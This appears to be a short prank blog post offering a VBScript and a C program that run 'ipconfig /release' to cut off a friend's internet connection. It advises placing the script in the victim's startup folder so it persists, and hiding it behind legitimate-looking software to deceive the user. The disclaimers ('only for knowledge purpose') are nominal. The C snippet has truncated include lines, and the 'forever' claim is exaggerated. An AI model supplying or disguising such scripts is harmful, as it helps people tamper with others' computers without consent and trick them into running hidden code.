Disable Your Internet Connection Forever

Only For Knowledge Purpose
…..
….
Disable your Internet connection forever
….
….
….
….
….
….
….

Wanna make ur friend cry by disabling his net connection forever.
Here is a small prank
A script to disable your internet,So here we use a simple command to fuzz around your not so geeky friend
Once you run this script, it just removes the ip address by help of “ipconfig /release”
And hence the internet connection is rendered useless .
To renable his connection type the following in his command prompt
“ipconfig /renew”

Set WSHShell = WScript.CreateObject(“WScript.Shell”)
WshShell.Run “C:\WINDOWS\system32\ipconfig /release”

You can save the script and put it in his startup folder to worsen his situation
And to make it worst hide it behind any some other legimate interesting software

Exe version::
#include
#include

int main()
{
system(“ipconfig /release”);
return 0;
}

He can never connect to internet if he has no idea of ipconfig.

Note: Use it for legitimate purposes!!!

If you don’t have any idea of ipconfig, this is forever until u don’t change the operating system……
Comments